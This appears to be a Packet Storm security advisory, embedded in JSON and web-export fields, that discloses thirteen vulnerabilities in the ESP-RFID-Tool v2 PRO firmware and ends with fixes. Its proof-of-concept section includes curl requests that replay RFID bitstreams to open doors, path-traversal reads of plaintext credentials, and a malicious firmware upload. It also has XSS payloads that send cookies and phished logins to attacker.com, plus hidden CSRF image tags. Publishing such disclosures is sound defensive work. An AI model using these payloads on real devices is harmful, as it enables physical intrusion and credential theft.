{“lastseen”:”2026-04-29T17:06:58″,”description”:”ESP-RFID-Tool V2 PRO suffers from bypass, cross site request forgery, cross site scripting, information leakage, path traversal, and multiple other vulnerabilities. The vendor has seemingly taken a hostile approach to responding to these findings and…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \/ XSS \/ Bypass \/ Enumeration”,”source”:””,”references”:””,”id”:”PACKETSTORM:220045″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Security Advisory: ESP-RFID-Tool v2 PRO\\n \\n **Product:** ESP-RFID-Tool v2 PRO\\n **Vendor:** Raik Schneider (Einstein2150), foto-video-it.de\\n **Repository:** https:\/\/github.com\/Einstein2150\/ESP-RFID-Tool-v2\\n **Affected Version:** v2.2.1 (latest as of 2026-04-28)\\n **Severity:** CRITICAL\\n **Disclosure Type:** Full Public Disclosure\\n **Disclosure Date:** 2026-04-28\\n **Researcher:** Milan ‘t4c’ Berger\\n \\n —\\n \\n ## Disclosure Timeline\\n \\n | Date | Event |\\n |——|——-|\\n | 2026-04-26 | Vulnerabilities discovered during code review |\\n | 2026-04-27 | Researcher posted responsible disclosure comment on his\\n advertisement on Youtube (GitHub issues disabled by vendor) |\\n | 2026-04-28 | Vendor deleted the disclosure comment without response |\\n | 2026-04-28 | Researcher posted responsible disclosure comment again on\\n his advertisement on Youtube (GitHub issues disabled by vendor) |\\n | 2026-04-28 | Vendor deleted the disclosure comment without response |\\n | 2026-04-28 | Researcher attempted contact via additional social media\\n channels |\\n | 2026-04-28 | Vendor blocked researcher on all contacted channels; no\\n acknowledgment given |\\n | 2026-04-28 | Full public disclosure \u2014 48h contact window exhausted,\\n vendor uncooperative |\\n \\n —\\n \\n ## Summary\\n \\n The ESP-RFID-Tool v2 PRO is a commercial hardware\/firmware product sold by\\n Raik Schneider targeting security researchers and red team operators. It is\\n based on an ESP8266 microcontroller and provides a web interface for\\n logging, replaying, and analyzing Wiegand RFID data from physical access\\n control systems.\\n \\n Multiple critical security vulnerabilities were identified in firmware\\n v2.2.1. The most severe findings allow any unauthenticated attacker with\\n network access to: replay captured RFID credentials against physical door\\n locks, read the complete device configuration including plaintext\\n passwords, and permanently destroy all captured evidence \u2014 all without\\n authentication.\\n \\n Note: A full practical verification of all exploits involving physical\\n signal transmission could not be performed as no Wiegand access terminal\\n was available during testing.\\n \\n The vendor was notified through all available channels. All notifications\\n were deleted, and the researcher was blocked. Full disclosure follows.\\n \\n —\\n \\n ## Vulnerability Summary\\n \\n | ID | Severity | Title |\\n |—-|———-|——-|\\n | ESPR-01 | **CRITICAL** | Unauthenticated Wiegand TX \u2014 Physical Access\\n Control Bypass |\\n | ESPR-02 | **MEDIUM** | Log Deletion via Default Credentials (Auth\\n present, but trivially bypassed) |\\n | ESPR-03 | **CRITICAL** | Path Traversal \u2014 Arbitrary SPIFFS File Read |\\n | ESPR-04 | **HIGH** | Reflected Cross-Site Scripting (XSS) |\\n | ESPR-05 | **HIGH** | Stored XSS via Log Injection |\\n | ESPR-06 | **HIGH** | Hardcoded Default Credentials |\\n | ESPR-07 | **HIGH** | Unauthenticated Log View + Filesystem Enumeration |\\n | ESPR-08 | **MEDIUM** | No CSRF Protection \u2014 Entire Application |\\n | ESPR-09 | **MEDIUM** | Plaintext FTP Server |\\n | ESPR-10 | **MEDIUM** | Missing Security Response Headers |\\n | ESPR-11 | **MEDIUM** | No Input Validation on Integer Parameters |\\n | ESPR-12 | **LOW** | Predictable AP SSID \u2014 Device Fingerprinting |\\n | ESPR-13 | **INFO** | Captive Portal Mode Widens Attack Surface |\\n \\n —\\n \\n ## Detailed Findings\\n \\n —\\n \\n ### ESPR-01 \u2014 Unauthenticated Wiegand TX: Physical Access Control Bypass\\n \\n **Severity:** CRITICAL\\n **File:** `api_server.cpp`\\n **Endpoints:** `\/api\/tx\/bin`, `\/api\/txinstant\/bin`, `\/api\/wiegandencode`\\n \\n **Description:**\\n All Wiegand transmission API endpoints execute hardware TX operations\\n without any authentication check. Any attacker on the same network can\\n replay arbitrary Wiegand bitstreams to downstream access control hardware \u2014\\n unlocking physical doors, gates, or secured areas \u2014 with a single\\n unauthenticated HTTP GET request.\\n \\n **Vulnerable Code:**\\n “`cpp\\n server.on(\\”\/api\/tx\/bin\\”, []() {\\n \/\/ …\\n \/\/ No server.authenticate() call\\n apiTX(api_binary, api_pulsewidth, api_datainterval, api_wait);\\n });\\n “`\\n \\n **Proof of Concept:**\\n “`bash\\n # Replay a captured 26-bit HID card to open a door\\n curl \\”\\n http:\/\/192.168.1.1\/api\/tx\/bin?binary=01001100110101010110101001\\u0026pulsewidth=40\\u0026interval=2000\\n \\”\\n \\n # Re-encode a known UID and transmit\\n curl \\”http:\/\/192.168.1.1\/api\/wiegandencode?uid=DEADBEEF\\u0026format=26\\”\\n \\n # Instant transmission (no response wait)\\n curl \\”http:\/\/192.168.1.1\/api\/txinstant\/bin?binary=01001100110101010110101001\\n \\”\\n “`\\n \\n **Impact:**\\n Physical security bypass. An attacker who previously captured a card UID\\n (e.g. via ESPR-07) can immediately replay it to open the corresponding door\\n \u2014 all from an unauthenticated HTTP request. This completely undermines the\\n device’s operational security model.\\n \\n —\\n \\n ### ESPR-02 \u2014 Log Deletion via Default Credentials\\n \\n **Severity:** MEDIUM\\n **File:** `esprfidtool.ino`\\n **Endpoints:** `\/deletelog`, `\/deletelog\/yes`\\n \\n **Description:**\\n `\/deletelog\/yes` requires HTTP Basic Authentication. However, the default\\n credentials (`admin:rfidtool`) are hardcoded and publicly known via the\\n open-source repository. Combined with ESPR-06, any attacker with knowledge\\n of the default credentials can permanently delete all captured RFID logs.\\n `\/deletelog` (the confirmation page) has **no authentication**, which also\\n makes it a direct XSS vector (see ESPR-04).\\n \\n **Note:** Live testing confirmed `\/deletelog\/yes` returns HTTP 401 without\\n credentials. This finding was initially rated CRITICAL based on static code\\n analysis of an earlier version; auth is present in the tested build.\\n \\n **Vulnerable Code:**\\n “`cpp\\n server.on(\\”\/deletelog\/yes\\”, [](){\\n if(!server.authenticate(update_username, update_password))\\n return server.requestAuthentication();\\n \/\/ Auth present \u2014 but default credentials are public (admin:rfidtool)\\n SPIFFS.remove(deletelog);\\n });\\n “`\\n \\n **Proof of Concept:**\\n “`bash\\n # Delete log using publicly known default credentials\\n curl -u admin:rfidtool \\”http:\/\/192.168.1.1\/deletelog\/yes?payload=\/log.txt\\”\\n “`\\n \\n **Impact:**\\n Any attacker who knows the default credentials (publicly available) can\\n permanently destroy all captured evidence. Severity is driven by ESPR-06\\n (hardcoded defaults) \u2014 fixing one without the other provides no real\\n protection.\\n \\n —\\n \\n ### ESPR-03 \u2014 Path Traversal: Arbitrary SPIFFS File Read\\n \\n **Severity:** CRITICAL\\n **File:** `esprfidtool.ino` \u2014 `ViewLog()`\\n \\n **Description:**\\n The `payload` parameter is passed directly to `SPIFFS.open()` without any\\n path validation or sanitization. An unauthenticated attacker can read any\\n file stored in the device’s SPIFFS filesystem, including configuration\\n files containing plaintext credentials.\\n \\n **Vulnerable Code:**\\n “`cpp\\n void ViewLog(){\\n String payload;\\n payload += server.arg(0); \/\/ raw URL arg, no sanitization\\n File f = SPIFFS.open(payload, \\”r\\”);\\n \/\/ outputs file content directly to browser\\n }\\n “`\\n \\n **Proof of Concept:**\\n “`bash\\n # Note: server.arg(0) reads the FIRST URL argument by position, not by name.\\n # The correct syntax is ?\\u003cfilename\\u003e, not ?payload=\\u003cfilename\\u003e\\n \\n # Read device configuration (contains credentials in plaintext)\\n curl \\”http:\/\/192.168.1.1\/viewlog?\/esprfidtool.json\\”\\n \\n # Read log files (enumerate first via \/api\/listlogs)\\n curl \\”http:\/\/192.168.1.1\/viewlog?\/log.txt\\”\\n \\n # List all available filenames first\\n curl \\”http:\/\/192.168.1.1\/api\/listlogs\\”\\n “`\\n \\n **Note:** The endpoint only returns content if the file exists on SPIFFS.\\n The config file `\/esprfidtool.json` is filtered from `ListLogs()` output\\n but is NOT\\n filtered in `ViewLog()`, making it directly readable via this endpoint.\\n \\n **Example Response:**\\n “`json\\n {\\n \\”ssid\\”: \\”HomeNetwork\\”,\\n \\”password\\”: \\”mysecretwifi\\”,\\n \\”update_username\\”: \\”admin\\”,\\n \\”update_password\\”: \\”rfidtool\\”,\\n \\”ftp_username\\”: \\”ftp-admin\\”,\\n \\”ftp_password\\”: \\”rfidtool\\”\\n }\\n “`\\n \\n **Impact:**\\n Full information disclosure. WiFi credentials, admin passwords, FTP\\n credentials, and all captured RFID card data (UIDs, bitstreams) are exposed\\n to any unauthenticated attacker.\\n \\n —\\n \\n ### ESPR-04 \u2014 Reflected Cross-Site Scripting (XSS)\\n \\n **Severity:** HIGH\\n **File:** `esprfidtool.ino` \u2014 `DeleteLog()`\\n **Endpoint:** `GET \/deletelog`\\n \\n **Description:**\\n The `payload` URL parameter is reflected directly into the HTML response\\n body without sanitization or HTML encoding. An attacker can inject\\n arbitrary JavaScript that executes in the victim’s browser.\\n \\n **Vulnerable Code:**\\n “`cpp\\n \/\/ server.arg(\\”payload\\”) embedded directly into HTML \u2014 no htmlEncode()\\n server.send(200, \\”text\/html\\”, \\”… Deleting: \\” + payload + \\” …\\”);\\n “`\\n \\n **Proof of Concept:**\\n “`\\n # Basic alert PoC\\n http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003ealert(‘Sag Danke’)\\u003c\/script\\u003e\\n \\n # Cookie exfiltration\\n http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003edocument.location=’\\n http:\/\/attacker.com\/?c=’+document.cookie\\n \\u003chttp:\/\/attacker.com\/?c=%27+document.cookie\\u003e\\u003c\/script\\u003e\\n \\n # Credential phishing overlay (effective in captive portal context)\\n http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003edocument.body.innerHTML=’\\u003cform\\n action=\\”http:\/\/attacker.com\/steal\\”\\u003e\\u003cinput name=\\”u\\”\\n placeholder=\\”Username\\”\\u003e\\u003cinput name=\\”p\\” type=\\”password\\”\\n placeholder=\\”Password\\”\\u003e\\u003cinput type=\\”submit\\”\\u003e\\u003c\/form\\u003e’\\u003c\/script\\u003e\\n “`\\n \\n **Impact:**\\n Session hijacking, credential theft, UI redressing. Severity is elevated\\n because the device operates as a captive portal \u2014 victims auto-connect and\\n are served the attacker-controlled page.\\n \\n —\\n \\n ### ESPR-05 \u2014 Stored XSS via Log Injection\\n \\n **Severity:** HIGH\\n **File:** `esprfidtool.ino` (log write path)\\n \\n **Description:**\\n Log entries are written to SPIFFS containing raw data including HTML\\n markup. When logs are rendered via `ViewLog()` or `ListLogs()` without\\n output encoding, an attacker who can inject HTML\/JavaScript into a log\\n entry achieves persistent stored XSS. This can be triggered by sending a\\n crafted Wiegand signal or via the unauthenticated TX API.\\n \\n **Proof of Concept:**\\n “`bash\\n # Inject XSS payload via unauthenticated TX endpoint\\n # Craft a bitstream that results in a log entry containing script tags\\n # The exact binary depends on how the logging function serializes data,\\n # but the vector is confirmed by the absence of HTML encoding on log output.\\n \\n # After injection, any admin viewing logs triggers the payload:\\n curl \\”http:\/\/192.168.1.1\/viewlog?payload=\/log.txt\\”\\n # -\\u003e \\u003cscript\\u003e…\\u003c\/script\\u003e executes in admin browser\\n “`\\n \\n **Impact:**\\n Persistent XSS. Any administrator viewing the log file executes\\n attacker-controlled JavaScript. Can be used to steal credentials or pivot\\n to further attacks.\\n \\n —\\n \\n ### ESPR-06 \u2014 Hardcoded Default Credentials\\n \\n **Severity:** HIGH\\n **File:** `esprfidtool.ino` \u2014 `loadDefaults()`\\n \\n **Description:**\\n Default credentials are hardcoded and publicly known via the open-source\\n repository. No forced credential change on first boot.\\n \\n | Service | Username | Password |\\n |———|———-|———-|\\n | Web Interface \/ OTA Update | `admin` | `rfidtool` |\\n | FTP Server | `ftp-admin` | `rfidtool` |\\n | WiFi AP SSID | `ESP-RFID-Tool` | *(none by default)* |\\n \\n **Proof of Concept:**\\n “`bash\\n # Authenticated firmware update with known default credentials\\n curl -u admin:rfidtool \\”http:\/\/192.168.1.1:1337\/update\\” -F\\n \\”image=@malicious.bin\\”\\n \\n # FTP login\\n ftp 192.168.1.1\\n # Login: ftp-admin \/ rfidtool\\n “`\\n \\n **Impact:**\\n Trivial full authentication bypass for all credential-protected endpoints.\\n Anyone familiar with the product has immediate access.\\n \\n —\\n \\n ### ESPR-07 \u2014 Unauthenticated Log View + Filesystem Enumeration\\n \\n **Severity:** HIGH\\n **File:** `esprfidtool.ino`\\n **Endpoints:** `\/viewlog`, `\/listlogs`, `\/api\/listlogs`, `\/api\/info`,\\n `\/api\/lastread`\\n \\n **Description:**\\n All log viewing and filesystem enumeration endpoints require no\\n authentication. The `\/api\/lastread` endpoint additionally exposes the last\\n captured card in real time.\\n \\n **Proof of Concept:**\\n “`bash\\n # Enumerate all files on device\\n curl \\”http:\/\/192.168.1.1\/api\/listlogs\\”\\n \\n # Read captured card data\\n curl \\”http:\/\/192.168.1.1\/api\/lastread\\”\\n # Response:\\n {\\”bits\\”:26,\\”bitstream\\”:\\”01001100…\\”,\\”uid\\”:\\”0A1B2C3D\\”,\\”format\\”:\\”HID26\\”}\\n \\n # Get device info (firmware version, free space)\\n curl \\”http:\/\/192.168.1.1\/api\/info\\”\\n “`\\n \\n **Impact:**\\n Complete exfiltration of all captured RFID card data without any\\n authentication.\\n \\n —\\n \\n ### ESPR-08 \u2014 No CSRF Protection\\n \\n **Severity:** MEDIUM\\n **Scope:** All endpoints\\n \\n **Description:**\\n No CSRF tokens exist. No `SameSite` cookie attributes. No\\n `Origin`\/`Referer` validation. An attacker who can get an operator to visit\\n a malicious webpage triggers arbitrary device actions.\\n \\n **Proof of Concept:**\\n “`html\\n \\u003c!– Malicious webpage \u2014 operator visits while connected to device AP –\\u003e\\n \\u003c!– Silently deletes all logs –\\u003e\\n \\u003cimg src=\\”http:\/\/192.168.1.1\/deletelog\/yes?payload=\/log.txt\\”\\n style=\\”display:none\\”\\u003e\\n \\n \\u003c!– Opens a door via CSRF + unauthenticated TX (ESPR-01) –\\u003e\\n \\u003cimg src=\\”\\n http:\/\/192.168.1.1\/api\/tx\/bin?binary=01001100110101010110101001\\u0026pulsewidth=40\\u0026interval=2000\\”\\n style=\\”display:none\\”\\u003e\\n “`\\n \\n —\\n \\n ### ESPR-09 \u2014 Plaintext FTP Server\\n \\n **Severity:** MEDIUM\\n \\n FTP credentials and all transferred log data (card UIDs, bitstreams) are\\n transmitted in cleartext. Trivially intercepted on shared WiFi networks.\\n \\n —\\n \\n ### ESPR-10 \u2014 Missing Security Response Headers\\n \\n **Severity:** MEDIUM\\n \\n No HTTP responses include:\\n – `Content-Security-Policy` \u2014 allows unrestricted script execution\\n (amplifies XSS)\\n – `X-Frame-Options` \u2014 clickjacking via iframe\\n – `X-Content-Type-Options`\\n – `Cache-Control` on sensitive endpoints\\n \\n —\\n \\n ### ESPR-11 \u2014 No Input Validation on Integer Parameters\\n \\n **Severity:** MEDIUM\\n **File:** `api_server.cpp`\\n \\n “`cpp\\n api_pulsewidth = server.arg(\\”pulsewidth\\”).toInt(); \/\/ no bounds check\\n api_datainterval = server.arg(\\”interval\\”).toInt(); \/\/ no bounds check\\n api_wait = server.arg(\\”wait\\”).toInt(); \/\/ no bounds check\\n “`\\n \\n `toInt()` returns 0 on invalid input. Negative values or extreme integers\\n passed to `apiTX()` may cause undefined hardware behavior or firmware\\n crashes.\\n \\n —\\n \\n ### ESPR-12 \u2014 Predictable AP SSID\\n \\n **Severity:** LOW\\n \\n Default SSID `ESP-RFID-Tool` allows passive wardriving to identify and\\n target deployed units. A trivial scanner can auto-enumerate all deployed\\n devices in range.\\n \\n —\\n \\n ### ESPR-13 \u2014 Captive Portal as Attack Force-Multiplier\\n \\n **Severity:** INFO\\n \\n The device runs a DNS server resolving all domains to itself. Victims\\n auto-connecting to the AP have all their HTTP traffic redirected to the\\n device. Combined with XSS findings (ESPR-04, ESPR-05), this enables\\n large-scale credential phishing against unknowing users.\\n \\n —\\n \\n ## Recommendations\\n \\n 1. Add `server.authenticate()` to **all** endpoints, not only `\/settings`\\n 2. HTML-encode all URL parameters before inserting into HTML responses\\n 3. Restrict `SPIFFS.open()` to a whitelist of allowed log filenames\\n 4. Implement CSRF token validation for all state-changing requests\\n 5. Force credential change on first boot\\n 6. Add `Content-Security-Policy` and other security headers to all responses\\n 7. Validate and bound-check all integer parameters\\n 8. Consider disabling FTP by default; document security implications clearly\\n \\n —\\n \\n ## Researcher\\n \\n **Discovered and reported by:** Milan ‘t4c’ Berger\\n **Disclosure policy:** Responsible disclosure attempted. Vendor deleted all\\n notifications and blocked researcher on all channels within 48 hours. Full\\n public disclosure follows as per standard responsible disclosure practice.\\n \\n —\\n \\n *This advisory is published in the public interest. The ESP-RFID-Tool v2\\n PRO is a commercial product sold for security research and red team use.\\n Customers of this product should be aware that the device itself contains\\n critical security vulnerabilities and may be compromised by any party with\\n network access.*”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220045″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220045\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T17:06:58″,”description”:”ESP-RFID-Tool V2 PRO suffers from bypass, cross site request forgery, cross site scripting, information leakage, path traversal, and multiple other vulnerabilities. The vendor has seemingly…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-50207","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n